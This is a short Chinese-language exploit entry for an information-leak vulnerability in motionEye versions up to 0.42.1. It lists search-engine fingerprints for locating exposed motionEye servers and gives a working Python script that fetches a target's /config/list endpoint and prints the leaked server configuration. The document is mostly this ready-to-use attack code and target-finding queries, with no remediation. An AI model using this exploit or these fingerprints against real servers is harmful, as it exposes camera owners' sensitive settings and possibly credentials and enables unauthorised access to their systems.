motionEye是用Python写的motion的Web前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的URL即可获取服务器敏感信息
MotionEye <= v0.42.1
banner="motionEye"
app="motionEye"
app="motionEye-摄像头服务器"
app="motionEye/0.39.3"
app="motionEye/0.40"
app="motionEye01"
app="motionEye/0.33"
app="motionEye/0.35"
通过查看响应Server判断是否使用,访问路由/config/list
import sys
import json
import requests
def exp(url):
if url[-1] == "/":
url = url + "config/list"
else:
url = url + "/config/list"
rus = requests.get(url, verify=False)
print("信息泄露内容:")
print(json.dumps(json.loads(rus.text), sort_keys=True, indent=4))
if __name__ == '__main__':
ip = sys.argv[1]
print("访问IP:{0}".format(ip))
exp(ip)